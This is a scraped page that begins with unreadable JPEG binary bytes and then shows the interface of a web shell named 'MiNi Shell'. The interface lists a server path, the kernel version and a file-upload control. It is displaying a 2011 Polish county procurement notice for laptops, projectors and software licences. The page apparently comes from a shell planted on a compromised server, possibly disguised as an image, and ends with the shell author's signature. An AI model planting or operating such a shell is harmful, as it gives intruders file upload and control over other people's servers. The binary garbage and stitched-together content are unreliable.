JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110316/86185-N-2011.html

<p class="kh_header"><b>Kętrzyn: Zakup i dostawa sprzętu komputerowego, licencji, oprogramowania komputerowego</b><br>
<b>Numer ogłoszenia: 86185 - 2011; data zamieszczenia: 16.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Kętrzynie , Plac Grunwaldzki 1, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 7517500, 7511690, faks 089 7512401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.warmia.mazury.pl/powiat_ketrzynski/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sprzętu komputerowego, licencji, oprogramowania komputerowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> L.p.	NAZWA	OPIS PRZEDMIOTU	JEDNOSTKA 	ILOŚĆ
1	2	3	4	5
1.		Laptop	.	Procesor - opis: Intel Core i3 lub równoważny,.	Taktowanie: 2,4 GHz, pamięć cache: 3 MB.	Matryca - przekątna: 15,6 cala.	Pamięć RAM - 3 GB, DDR3 1066 MHz .	Dysk twardy - pojemność: 320 GB.	Napęd optyczny: Super Multi DVD+/-RW/RAM .	Karta dźwiękowa: zintegrowana, 2 głośniki, mikrofon.	Karta sieciowa .	Karta sieciowa bezprzewodowa.	Czytnik kart pamięci: 4 w 1 .	Złącze USB 2.0: x 3.	Wyjście HDMI, VGA.	System operacyjny: Windows 7 64 bit.	Akumulator: czas pracy: min. 2 h.	Gwarancja: 24 miesięcy.	Gwarancja baterii : 12 miesięcy.	Wyposażenie: torba i myszka optyczna w zestawie	Szt.	3
2.		Projektor multimedialny	.	Rozdzielczość podstawowa: XGA (1024 x 768) .	Rozdzielczość maksymalna: UXGA (1600 x 1200).	Jasność: 2200 ANSI lumen .	Moc lampy: 180 W .	Żywotność lampy (normal): 4000 h, (econ): 5000 h .	Kontrast: 500 :1.	Format obrazu (standard): 4:3 .	Korekcja pionowa: +/- 30 Stopni .	Min. wielkość obrazu: 21 cale, maks. wielkość obrazu: 300 cale.	 Obsługa NTSC/PAL/SECAM .	Wejście D-Sub 15pin (ilość) .	Wyjście D-Sub 15pin (ilość) .	 Wejście S-Video mini DIN .	Wejście video .	Wejście audio.	Gniazdo RS-232 .	Głośniki: 7 W głośnik .	Wyposażenie: torba, pilot, baterie, kabel zasilający, kabel sygnałowy RGB, osłona lampy, instrukcja obsługi.	Gwarancja na projektor: 36 miesięcy.	Gwarancja na lampę: 6 miesięcy	Szt.	1
3.		Ekran do projekcji	.	Obudowa metalowa .	Statyw z trójnogiem.	Mechanizm zwijający z napędem sprężynowym.	Możliwość regulacji wysokości ekranu  i dolnej krawędzi oraz napinacz powierzchni .	Format: 4:3.	Wymiary 203,00x153,00 (cm)	Szt.	1
4.		Stojak pod projektor i laptopa	.	Dwie niezależne półki na projektor i komputer regulowane w pionie, dodatkowo obracające się o 360 stopni. .	Max wysokość 120 cm. .	Max obciążenie półek 10 kg każda. .	Podstawa na 4 kółkach. 	Szt.	4
5.		Uchwyty sufitowe do projektora	.	Dla projektorów o wadze nie przekraczającej 14 kg.	Regulacja urządzenia w 2 płaszczyznach.	Możliwość regulacji kąta nachylenia.	Wysięgnik wykonany z rury aluminiowej z regulacją do 65 cm	Szt.	3
6.		Zestaw interaktywny	1)	Tablica multimedialna.	Przekątna robocza 78``.	Waga do 20 kg.	Technologia: bezprzewodowa indukcja magnetyczna.	Powierzchnia: polimerowa, matowa, antyodblaskowa, odporna na rozdarcia, pęknięcia, uderzenia, zoptymalizowana zarówno do projekcji jak i pisania, dodatkowo zabezpieczona powłoką suchościeralną .	Klawisze szybkiego dostępu po obu stronach tablicy.	Rozdzielczość: 9600×9600, 600dpi.	Wyposażenie: 10 m kabel usb, oprogramowanie opracowane dla potrzeb edukacyjnych i szkoleniowych, dwa pióra elektromagnetyczne, dwie dodatkowe końcówki do każdego z piór2)	Projektor multimedialny.	Technologia: DLP.	Rozdzielczość podstawowa: XGA (1024 x 768).	Rozdzielczość maksymalna: 1600x1200 (UXGA) .	Jasność: 2700 (1900 w trybie ekonomicznym).	Kontrast 750 : 1.	Czas pracy lampy: 3000 h.	Cyfrowa korekcja trapezu w pionie: +15° / -15°.	Funkcje: auto-strojenie, menu w j. polskim, projekcja odwrócona, projekcja sufitowa, projekcja tylna .	Wejście i wyjście audio: 1 x Audio (3,5 mm stereo mini jack).	Wyjście komputer: 2 x VGA (DB-15).	Wejście video .	Wbudowany głośnik: 1 x 7.0 W .	Wyposażenie: pilot + baterie, osłona obiektywu, przewód zasilający, przewód VGA,  instrukcja obsługi.	Gwarancja: 36 miesięcy .	Gwarancja na lampę: 3 lata lub 2000h3)	Podstawa jezdna do tablicy.	podstawa na kółkach z regulacją wysokości, ustawienie tablicy w zakresie +-50 cm..	Składany wysięgnik do projektora z regulowaną długością 82cm-120cm.	Podstawa zintegrowana z wysięgnikiem	Zestaw	3
7.		Myszka komputerowa	.	Mysz optyczna.	Port: USB.	Rozdzielczość: 800dpi.	3 przyciski + rolka przewijania.	Długość przewodu: 1,5 m.	 Zgodność z Windows XP/7 .	Gwarancja min. 24 miesiące	Szt.	15
8.		Pamięć RAM	2 GB DDR2 800 PC2-6400	Szt. 	45
9.		Pamięć pen-drive	.	Typ pamięci: USB 2,0 Flash.	Pojemność: 8 GB.	Szybkość odczytu: 27 MB/s.	Szybkość zapisu: 25 MB/s.	Wysuwane złącze USB.	Otwór na smycz	Szt.	30
10.		Pilot do prezentacji	.	Technologia bezprzewodowa 2.4 GHZ .	Typ złącza USB 2.0.	Zasięg do 20 metrów.	4 przyciski dostarczające szybki dostęp do wskaźnika laserowego i funkcji przewijania.	Odbiornik USB chowany w obudowie pilota.	Wskaźnik laserowy.	Bezprzewodowy odbiornik typu plug & play	Szt.	12
11.		Licencja - system operacyjny Windows 7	.	Home Premium 32 bit .	Język polski.	Wersja edukacyjna dla 1 placówki oświatowej	Stanowisko	15
12.		Licencja - MS Office 2007	.	Zawartość: Outlook, Word, Power Point, Excel, Access, Publisher, Business Contact Manager .	wersja edukacyjna dla 4 placówek oświatowych	Stanowisko	48
13.		Program antywirusowy	.	Program antywirusowy i antyspyware  do ochrony  stacji roboczych Windows XP/7.	ochrona przed wirusami, robakami internetowymi, spyware, phishing i in..	licencja na 1 rok z możliwością kontynuacji licencji.	wersja edukacyjna dla 4 placówek oświatowych	Stanowisko	48
14.		Program do tworzenia animacji, Adobe Flash pro CS v. 11 PL Win AOO	.	wersja polska.	współpraca z bazami danych oraz integracja animacji z serwisami WWW.	program będzie użytkowany przez  1 szkołę	Stanowisko	15
15.		Program finansowo-księgowy INSERT	.	Program stworzony w oparciu o Ustawę o Rachunkowości oraz dostosowany do wymogów Unii Europejskiej.	posiada funkcje niezbędne do sprawnego prowadzenia księgi handlowej: administrowanie planami kont, dekretacja i księgowanie, zarządzanie rozrachunkami, obsługa środków trwałych.	program będzie użytkowany przez  1 placówkę oświatową	Stanowisko	15
Dokładny opis przedmiotu zamówienia zawiera SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.00.00-0, 48.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zamówienie polegające na dostawie sprzętu multimedialnego, o wartości nie mniejszej niż 10.000 zł brutto. Ocena spełnienia zostanie dokonana na podstawie złożonych oświadczeń i dokumentów, według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony gdy Wykonawca oświadczy, 
że dysponuje odpowiednimi osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz oferty zawierający oświadczenie Wykonawcy, że zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń - zgodny w treści z wzorem stanowiącym załącznik nr 1 do SIWZ;

2.	Pełnomocnictwo ustanowione do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, z którego wynika zakres, podpisane przez osoby uprawnione do reprezentowania Firmy. W przypadku podmiotów wspólnie ubiegających się o zamówienie, pełnomocnictwo takie może wynikać z dołączonej oferty umowy konsorcjum lub umowy spółki cywilnej. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.warmia.mazury.pl/powiat_ketrzynski/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Kętrzynie Plac Grunwaldzki 1, 11-400 Kętrzyn, pokój nr 52.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2011 godzina 12:00, miejsce: Starostwo Powiatowe w Kętrzynie Plac Grunwaldzki 1, 11-400 Kętrzyn, pokój nr 52.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Wykorzystaj szansę 2 realizowany przez Starostwo Powiatowe w Kętrzynie jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com